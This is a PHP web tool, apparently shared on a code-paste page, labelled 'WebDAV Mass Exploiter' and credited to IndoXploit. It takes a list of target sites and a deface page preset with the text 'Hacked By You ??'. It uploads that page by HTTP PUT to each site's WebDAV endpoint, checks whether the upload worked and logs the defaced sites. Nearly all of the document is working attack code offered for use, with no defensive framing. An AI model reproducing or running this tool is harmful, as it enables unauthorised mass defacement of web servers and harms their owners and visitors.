webdav mass exploiter

1.     <?php
2.     # ===============================
3.    # ===============================
4.    # ===============================
5.    # web version
6.    ?>
7.     <head><title>WebDAV Mass Exploiter</title></head>
8.     <style>
9.     body { font-family: Atma }
10.     input, textarea { font-family: Atma }
11.     th { background:black;color:#fff;padding:3px;font-family: Suez One}
12.     </style>
13.     <link href='http://fonts.googleapis.com/css?family=Atma' rel='stylesheet' type='text/css'/>
14.     <link href='http://fonts.googleapis.com/css?family=Suez+One' rel='stylesheet' type='text/css'/>
15.     <center>
16.     <table><tr><th>WebDAV Exploiter IndoXploit</th></tr> <tr><td><form action="" method="POST">
17.     <textarea name="isi" style="height:100px;width:500px"></textarea><br><br>
18.     <textarea name="isi1" style="height:100px;width:500px">Hacked By You ??</textarea><br><br>
19.     <input type="hidden" name="site" value="list.txt">
20.     <input type="hidden" name="file" value="x.htm">
21.     <center><input type="submit" style="background:black;color:#fff;padding:3px;border:0" name="go" value="&lt;&lt; Execute &gt;&gt;"></center>
22.     </form>
23.     </td></tr></table>
24.     <table> <tr><th>Result Deface</th></tr> <tr><td>
25.     <div style="border:1px solid black;border-bottom:5px solid black; padding:3px;height:auto;width:500px">
26.     <?php
27.      
28.     if($_POST['go']){
29.      
30.             $nama = "x.htm";
31.             $isi = $_POST['isi1'];
32.             $fp = fopen($nama,"w");
33.             fputs($fp, $isi);
34.        
35.             $nama = "list.txt";
36.             $isi = $_POST['isi'];
37.             $fp = fopen($nama,"w");
38.             fputs($fp, $isi);
39.          
40.        
41.      
42.     ?>
43.     <?php
44.      
45.     # IndoXploit
46.    # thx @AdeRoot | magelang6etar
47.    # blog.indoxploit.or.id
48.    
49.     $sites = $_POST[site];
50.     $file = $_POST[file];
51.     $fp = fopen($file, "r");
52.     $buka=fopen("$sites","r");
53.     $filesize = filesize($file);
54.     $size=filesize("$sites");
55.     $baca=fread($buka,$size);
56.     $sites = explode("\r\n", $baca);
57.     foreach($sites as $site){
58.     if(preg_match("#http://#", $site)) {
59.         $site = $site;
60.      } else {
61.        $site = "http://".$site;
62.      }
63.     $site = "$site/$file";
64.     $ch = curl_init();
65.     curl_setopt($ch, CURLOPT_URL, $site);
66.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
67.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
68.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0");
69.     curl_setopt($ch, CURLOPT_PUT, true);
70.     curl_setopt($ch, CURLOPT_INFILE, $fp);
71.     curl_setopt($ch, CURLOPT_INFILESIZE, $filesize);
72.     curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
73.     curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
74.     $exec = curl_exec($ch);
75.     echo "$site -> ";
76.     $su = curill($site);
77.     if(preg_match("/hacked/i", $su)) {
78.         echo "<font color=green>Success</font><br>\n\n";
79.        file_put_contents("webdav_shell.htm", "$site<br>", FILE_APPEND);
80.     } else {
81.       echo "<font color=red>Failed</font><br>\n";
82.       }
83.     }
84.     }
85.     function curill($site){
86.       $ch = curl_init ("$site");
87.     curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
88.     curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
89.     curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
90.     curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
91.     curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
92.     curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
93.     curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
94.     $data3 = curl_exec ($ch);
95.     return $data3;
96.      }
97.     ?>
98.     </div>
99.     </td></tr>
100.     <tr><th>Web Version</th></tr></table></center>